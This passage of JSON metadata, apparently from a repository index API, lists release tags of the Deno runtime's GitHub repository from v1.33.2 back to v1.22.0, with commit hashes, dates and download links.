1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.0/manifests"},{"name":"v1.28.3","sha":"74064c9d8c222b33b2a552ea0af1054f57002a96","kind":"commit","published_at":"2022-12-01T10:10:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.3/manifests"},{"name":"v1.28.2","sha":"1aca16e23998ee54f6a15217cd4cc6b8b13299b7","kind":"commit","published_at":"2022-11-24T20:22:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.2/manifests"},{"name":"v1.28.1","sha":"2743d42099cb0596f03c7d1252e5cfbb53f7a9ec","kind":"commit","published_at":"2022-11-16T23:35:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.1/manifests"},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3